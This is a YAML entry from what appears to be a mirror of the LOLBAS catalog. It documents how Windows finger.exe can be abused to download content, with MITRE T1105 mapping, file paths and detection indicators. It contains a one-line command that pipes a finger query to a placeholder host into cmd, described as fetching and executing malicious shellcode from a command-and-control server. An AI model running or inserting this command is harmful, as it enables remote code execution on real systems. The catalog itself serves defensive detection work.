mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2024-10-23 00:58:42 +02:00
28 lines
1.2 KiB
YAML
28 lines
1.2 KiB
YAML
|
Name: Finger.exe
|
||
|
Description: Displays information about a user or users on a specified remote computer that is running the Finger service or daemon
|
||
|
Author: Ruben Revuelta
|
||
|
Created: 2021-08-30
|
||
|
Commands:
|
||
|
- Command: finger user@example.host.com | more +2 | cmd
|
||
|
Description: Connects to "example.host.com" domain asking for the fake user "user" downloading as a result a malicious shellcode which is executed by cmd process.
|
||
|
Usecase: Download malicious shellcode from Command & Control server.
|
||
|
Category: Download
|
||
|
Privileges: User
|
||
|
MitreID: T1105
|
||
|
MitreLink: https://attack.mitre.org/techniques/T1105
|
||
|
OperatingSystem: From Windows Server 2008 and Windows 8
|
||
|
Full_Path:
|
||
|
- Path: c:\windows\system32\finger.exe
|
||
|
- Path: c:\windows\syswow64\finger.exe
|
||
|
Code_Sample:
|
||
|
- Code:
|
||
|
Detection:
|
||
|
- IOC: finger.exe spawn is not common in client systems.
|
||
|
- IOC: finger.exe connecting to external resources.
|
||
|
Resources:
|
||
|
- Link: https://docs.microsoft.com/es-es/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/ff961508(v=ws.11)
|
||
|
Acknowledgement:
|
||
|
- Person: Ruben Revuelta (MAPFRE CERT)
|
||
|
Handle: @rubn_RB
|
||
|
- Person: Jose A. Jimenez (MAPFRE CERT)
|
||
|
Handle: @Ocelotty6669
|